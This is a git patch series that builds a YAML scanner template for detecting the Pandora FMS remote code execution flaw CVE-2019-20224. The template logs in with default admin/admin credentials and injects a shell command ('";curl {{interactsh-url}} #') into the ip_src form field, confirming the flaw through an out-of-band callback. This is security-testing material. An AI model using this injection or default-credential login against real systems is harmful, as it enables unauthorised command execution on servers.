From 277fe4d514f36ada7c125e5f8dcde684e4e59b9d Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sat, 16 Apr 2022 13:46:17 +0530 Subject: [PATCH 1/4] Create CVE-2019-20224.yaml --- cves/2019/CVE-2019-20224.yaml | 33 +++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 cves/2019/CVE-2019-20224.yaml diff --git a/cves/2019/CVE-2019-20224.yaml b/cves/2019/CVE-2019-20224.yaml new file mode 100644 index 0000000000..901723d27c --- /dev/null +++ b/cves/2019/CVE-2019-20224.yaml @@ -0,0 +1,33 @@ +id: CVE-2019-20224 + +info: + name: Pandorafms RCE + author: ritikchaddha + severity: critical + reference: + - https://shells.systems/pandorafms-v7-0ng-authenticated-remote-code-execution-cve-2019-20224/ + tags: pandorafms,rce,cve,cve2019 + +requests: + - raw: + - | + POST /pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0 HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + date=0&time=0&period=0&interval_length=0&chart_type=netflow_area&max_aggregates=1&address_resolution=0&name=0&assign_group=0&filter_type=0&filter_id=0&filter_selected=0&ip_dst=0&ip_src=%22%3Bcurl+{{interactsh-url}}+%23&draw_button=Draw + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + + - type: word + part: interactsh_protocol + name: http + words: + - "http" + + - type: status + status: + - 200 From c8894336554c33c272eb88cfd60b2b702ae43486 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 25 Apr 2022 03:28:12 +0400 Subject: [PATCH 3/4] Update CVE-2019-20224.yaml --- cves/2019/CVE-2019-20224.yaml | 13 ++++++++++--- 1 file changed, 10 insertions(+), 3 deletions(-) diff --git a/cves/2019/CVE-2019-20224.yaml b/cves/2019/CVE-2019-20224.yaml index 901723d27c..1d9d44f164 100644 --- a/cves/2019/CVE-2019-20224.yaml +++ b/cves/2019/CVE-2019-20224.yaml @@ -3,13 +3,20 @@ id: CVE-2019-20224 info: name: Pandorafms RCE author: ritikchaddha - severity: critical + severity: high reference: - https://shells.systems/pandorafms-v7-0ng-authenticated-remote-code-execution-cve-2019-20224/ - tags: pandorafms,rce,cve,cve2019 + tags: pandorafms,rce,cve,cve2019,authenticated,oast requests: - raw: + - | + POST /pandora_console/index.php?login=1 HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + nick=admin&pass=admin&login_button=Login + - | POST /pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0 HTTP/1.1 Host: {{Hostname}} @@ -17,11 +24,11 @@ requests: date=0&time=0&period=0&interval_length=0&chart_type=netflow_area&max_aggregates=1&address_resolution=0&name=0&assign_group=0&filter_type=0&filter_id=0&filter_selected=0&ip_dst=0&ip_src=%22%3Bcurl+{{interactsh-url}}+%23&draw_button=Draw + cookie-reuse: true redirects: true max-redirects: 2 matchers-condition: and matchers: - - type: word part: interactsh_protocol name: http From 7e1ccf10c90b981fca5e6b52ecfa6336be40a375 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 24 May 2022 15:56:32 +0530 Subject: [PATCH 4/4] Update CVE-2019-20224.yaml --- cves/2019/CVE-2019-20224.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-20224.yaml b/cves/2019/CVE-2019-20224.yaml index 1d9d44f164..77cc6ea991 100644 --- a/cves/2019/CVE-2019-20224.yaml +++ b/cves/2019/CVE-2019-20224.yaml @@ -1,11 +1,12 @@ id: CVE-2019-20224 info: - name: Pandorafms RCE + name: Pandorafms - Remote Code Execution author: ritikchaddha severity: high reference: - https://shells.systems/pandorafms-v7-0ng-authenticated-remote-code-execution-cve-2019-20224/ + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20224 tags: pandorafms,rce,cve,cve2019,authenticated,oast requests: